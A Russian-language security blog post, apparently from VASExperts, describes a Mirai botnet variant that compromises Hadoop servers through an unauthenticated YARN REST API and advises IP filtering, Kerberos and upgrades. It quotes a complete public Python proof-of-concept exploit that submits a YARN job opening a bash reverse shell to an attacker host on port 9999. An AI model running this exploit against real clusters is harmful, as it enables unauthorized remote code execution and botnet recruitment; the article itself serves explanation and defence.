- PVSM.RU - https://www.pvsm.ru -
Ботнет Mirai появился в 2016 году и за короткое время успел заразить [1] более 600 тыс. IoT-устройств. На прошлой неделе стало известно [2] о новой версии Mirai, цель которой — Linux-серверы с Hadoop. Разбираемся, какую уязвимость использует вирус и как её «прикрыть».
[3]
/ Flickr / D J Shin [4] / CC BY-SA [5]
Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn [6], что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.
Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. В случае успеха гаджет становился частью «вредоносной сети».
В конце 2016 года разработчики выложили исходные коды [7] вируса в сеть. Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.
Отчет [8] о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.
Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet. Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.
При этом новый ботнет не ставит вредоносное ПО на взломанное устройство самостоятельно. Червь отправляет злоумышленникам IP-адрес уязвимой машины и пару логин-пароль для неё. Затем хакеры устанавливают DDoS-ботов вручную.
Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.
При неверной конфигурации YARN атакующий может получить [9] доступ к внутреннему REST API системы через порты 8088 и 8090. Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. К слову, об этой проблеме известно [10] уже несколько лет — на ExploitDB [11] и GitHub [12] опубликованы PoC-эксплоиты.
Например, на GitHub представлен следующий код [13] эксплойта:
#!/usr/bin/env python
import requests
target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.
По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.
Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах. Пока таких случаев зарегистрировано не было, но эксперты предупреждают [14], что это лишь вопрос времени.
Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN. Причем все атаки идут с небольшого числа IP-адресов — не более сорока.
/ Flickr / Jelene Morris [15] / CC BY [16]
Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины. Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости.
Для защиты от атаки нужно изменить настройки [9] безопасности сети. Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений.
Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.
Пара свежих материалов из нашего блога на Хабре:
Автор: VASExperts
Источник [22]
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/linux/300792
Ссылки в тексте:
[1] заразить: https://www.wired.com/story/mirai-botnet-minecraft-scam-brought-down-the-internet/
[2] стало известно: https://www.theregister.co.uk/2018/11/22/mirai_for_linux_on_x86/
[3] Image: https://habr.com/company/vasexperts/blog/431686/
[4] D J Shin: https://commons.wikimedia.org/wiki/File:Schylling_%E2%80%93_Replica_Atomic_Robot_Man_%E2%80%93_Four_Mechanic_Angels_of_Destruction.jpg
[5] CC BY-SA: https://creativecommons.org/licenses/by-sa/3.0/
[6] крупного DNS-провайдера Dyn: https://en.wikipedia.org/wiki/2016_Dyn_cyberattack
[7] исходные коды: https://xakep.ru/2016/10/03/mirai-source-code/
[8] Отчет: https://asert.arbornetworks.com/mirai-not-just-for-iot-anymore/
[9] может получить: https://medium.com/@neerajsabharwal/hadoop-yarn-hack-9a72cc1328b6
[10] проблеме известно: http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf
[11] ExploitDB: https://www.exploit-db.com/exploits/45025/
[12] GitHub: https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
[13] представлен следующий код: https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py
[14] предупреждают: https://www.extrahop.com/company/blog/2018/detect-demonbot-exploiting-hadoop-yarn-remote-code-execution/
[15] Jelene Morris: https://www.flickr.com/photos/jelene/2594095295
[16] CC BY: https://creativecommons.org/licenses/by/2.0/
[17] Ботнет «спамит» через роутеры — что нужно знать: https://vasexperts.ru/blog/bezopasnost/botnet-spamit-cherez-routery/
[18] Внедрение IPv6 — FAQ для интернет-провайдеров: https://vasexperts.ru/blog/seti/vnedrenie-ipv6-faq-dlya-internet-provajderov/
[19] DDOS и 5G: толще «труба» — больше проблем: https://vasexperts.ru/blog/bezopasnost/ddos-i-5g-tolshhe-truba-bolshe-problem/
[20] Как будут запускать Starlink — спутниковый интернет от Илона Маска: https://habr.com/company/vasexperts/blog/430136/
[21] На замену TCP: протокол QUIC готов для внедрения [но не готов стать RFC]: https://habr.com/company/vasexperts/blog/429380/
[22] Источник: https://habr.com/post/431686/?utm_campaign=431686
Нажмите здесь для печати.